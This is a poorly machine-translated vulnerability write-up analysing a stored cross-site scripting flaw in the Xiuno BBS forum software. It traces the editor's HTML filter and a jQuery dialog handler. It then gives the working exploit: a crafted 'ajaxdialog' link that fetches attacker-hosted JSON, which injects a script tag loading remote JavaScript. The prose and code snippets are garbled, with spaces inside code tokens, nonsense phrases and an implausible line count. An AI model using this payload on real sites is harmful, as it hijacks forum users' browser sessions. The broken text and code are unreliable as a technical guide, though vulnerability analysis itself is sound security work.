Xiuno bbs xss Vulnerability simple xss white box analysis with exp

PrefaceBrush microblogging saw seay issued a domineering cms http://www.bkjia.com/Article/201304/205091.html
The official introduction of Xiuno, the name of which is derived from Saint Seiya Shura, the prime Saint Seiya of Aries. His attack speed and combat power are the strongest in the 12th Palace. He is the embodiment of speed and strength. In Buddhism, shura is one of the six, in the path between man and heaven, half a god, strong temperament, good combat. We want XIUNO to become stronger and faster. At the beginning of Xiuno BBS's first line of code (a total of more than 4 million lines of code, which has been accumulated for many years), the pursuit of performance has been harsh, perfect, hysterical, and nervous, the author is often in a meditation State because of the trade-off between a solution. Under tens of millions of data records, the final program execution speed is basically controlled at X seconds, which is quite satisfactory to the author. Architecture Analysis example-admin // background directory │ example-conf │ example-control // background action file │ example-view Example-conf // configure example-control // foreground action example -model // System model ....... // The front-end template preview-view │ images │ audio-filetype │ audio-js │ audio-clipimg │ audio-editor preview-xiunophp // after the core framework Xxoo, what are the discoveries of wood, send a post, Rich Text Editor, upload an attachment, and its verification file model/attach. class. php will rename the file name whitelist verification mechanism, but html txt can be uploaded ........ Let's continue to look at the filter in the rich text editor to track all the way to xiunophp \ lib \ xn_html_safe.class.php. This filter is basically safe to filter various tag events, JavaScript tags. since Xss white box analysis is not a ubb Forum tag, we can use a variety of complicated html tags. For such jquery-based front-end, various ajax and other event functions are greatly available. (Some javascript and jquery basics are required for analysis.) For example, let's look at the Code <a rel = "nofollow" target = "_ blank" onclick = "return false; "ajaxdialog =" {showtitle: false, cache: true, position: 6, modal: false} "class =" ajaxdialog "href =" http://w/coder/xiuno/?attach-dialog-fid-1-aid-8-ajax-1.htm "> 1.html </a> is used to click a download dialog box. The content in the dialog box is obtained from remote ajax and found in the javascript file. The click event of this hyperlink is displayed, in the Template File view/footer.html $ ('a. ajaxdialog, input. ajaxdialog '). die ('click '). live ('click', ajaxdialog_click); Mark each class = "ajaxdialog" a with a bound click event, in common. js finds the ajaxdialog_click function ajaxdialog_click (e) {var e = e? E: window. event; // compatible with event var url =$ (this ). attr ('href '); // read the herf attribute of the tag ............ var recall = this. recall? This. recall: null; ajaxdialog_request (url, recall, options); // remotely retrieve the content return false;} continue to follow up with ajaxdialog_request function ajaxdialog_request (url, recall, options) {....... $. get (url, {ajax: 1}, function (s) {// jquery ajax get var json = json_decode (s );.......... jdialog. dialog (options); // call the jquery dialog box plug-in and pass in various attributes} The json_decode function is used to parse json data, which is equivalent to eval, which executes the herf tag value of the ajax hyperlink, if herf values are controllable, You can execute any html code. In Rich Text Editor source code mode, you can construct a hyperlink. <a href =" http://w/1.html "Class =" ajaxdialog "ajaxdialog =" {showtitle: false, cache: true, position: 6, modal: false} "target =" _ blank "rel =" nofollow "> slice. rmvb </a> 1.html put json-encoded data and insert the script tag. Data: {"servererror": "", "status": 1, "message ": {"width": "400", "height": 300, "pos": "center", "title ": "\ u9644 \ u4 .............. \ n <script type = \ "text \/javascript \" src = \ "http: \/w/1. js \ "> <\/script> \ n"}, click the attachment download effect, and the xss is successfully triggered.